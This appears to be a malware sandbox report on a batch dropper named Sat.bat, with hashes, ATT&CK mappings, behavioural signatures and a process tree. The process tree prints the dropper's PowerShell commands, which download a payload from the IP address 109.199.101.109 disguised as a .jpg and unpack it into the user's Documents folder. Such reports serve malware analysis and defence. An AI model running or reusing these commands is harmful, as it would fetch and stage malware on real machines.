64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80

General

Target

Sat.bat
Size

2KB
MD5

0e2fff554ddadc58aaff7978ec06aa32
SHA1

b453b17905235ea96150c90711285f7879d3afc0
SHA256

64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80
SHA512

c54cc4c956dc733835d0d40d49377b23b8b63bfa118e0e9ed5bba18e2b2b5f4a33656cd5b75230cd7dec05a98a3bc4b84b429121cffe3644fff72fc628b83b76

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://109.199.101.109:770/xx.jpg

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 2684 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Start PowerShell.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2900 powershell.exe
2684 powershell.exe
1688 powershell.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

784 timeout.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2900 powershell.exe
2900 powershell.exe
2900 powershell.exe
2684 powershell.exe
1688 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2900 powershell.exe
Token: SeDebugPrivilege 2684 powershell.exe
Token: SeDebugPrivilege 1688 powershell.exe

flow	pid	process
4	2684	powershell.exe

pid	process
2900	powershell.exe
2684	powershell.exe
1688	powershell.exe

pid	process
784	timeout.exe

pid	process
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe
2684	powershell.exe
1688	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2900	powershell.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cmd.exepowershell.execmd.exe

description	pid	process	target process
PID 3064 wrote to memory of 2900	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 2900	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 2900	3064	cmd.exe	powershell.exe
PID 2900 wrote to memory of 2868	2900	powershell.exe	cmd.exe
PID 2900 wrote to memory of 2868	2900	powershell.exe	cmd.exe
PID 2900 wrote to memory of 2868	2900	powershell.exe	cmd.exe
PID 2868 wrote to memory of 2684	2868	cmd.exe	powershell.exe
PID 2868 wrote to memory of 2684	2868	cmd.exe	powershell.exe
PID 2868 wrote to memory of 2684	2868	cmd.exe	powershell.exe
PID 2868 wrote to memory of 1688	2868	cmd.exe	powershell.exe
PID 2868 wrote to memory of 1688	2868	cmd.exe	powershell.exe
PID 2868 wrote to memory of 1688	2868	cmd.exe	powershell.exe
PID 2868 wrote to memory of 784	2868	cmd.exe	timeout.exe
PID 2868 wrote to memory of 784	2868	cmd.exe	timeout.exe
PID 2868 wrote to memory of 784	2868	cmd.exe	timeout.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Sat.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Sat.bat' -ArgumentList 'minimized' -WindowStyle Minimized"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\Sat.bat" minimized "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://109.199.101.109:770/xx.jpg', 'C:\Users\Admin\Documents\x.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Expand-Archive -Path 'C:\Users\Admin\Documents\x.zip' -DestinationPath 'C:\Users\Admin\Documents'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1688
  - - C:\Windows\system32\timeout.exe
      timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f758d3803ea7b154d9600ed661880cb1

SHA1
98a555dbed4eea55bb36a2185466d33175a43a62

SHA256
c7619966d67907248b13da00d5d5b58b25b0ead4b00c6f5ece84bd4073ace430

SHA512
ba94bc9df3a7ac7174b14e35d0d1696772ccc47b54327f5884a877f392aa5535267e8dcd126b49904089b986f1e9304f95a0ad49f4c7338c97466f092ae71008

Download Submit
memory/1688-23-0x000000001B320000-0x000000001B602000-memory.dmp

Filesize
2.9MB

Download
memory/1688-24-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/2900-4-0x000007FEF588E000-0x000007FEF588F000-memory.dmp

Filesize
4KB

Download
memory/2900-5-0x000000001B3E0000-0x000000001B6C2000-memory.dmp

Filesize
2.9MB

Download
memory/2900-6-0x0000000002460000-0x0000000002468000-memory.dmp

Filesize
32KB

Download
memory/2900-8-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

Filesize
9.6MB

Download
memory/2900-7-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

Filesize
9.6MB

Download
memory/2900-9-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

Filesize
9.6MB

Download
memory/2900-10-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

Filesize
9.6MB

Download
memory/2900-11-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing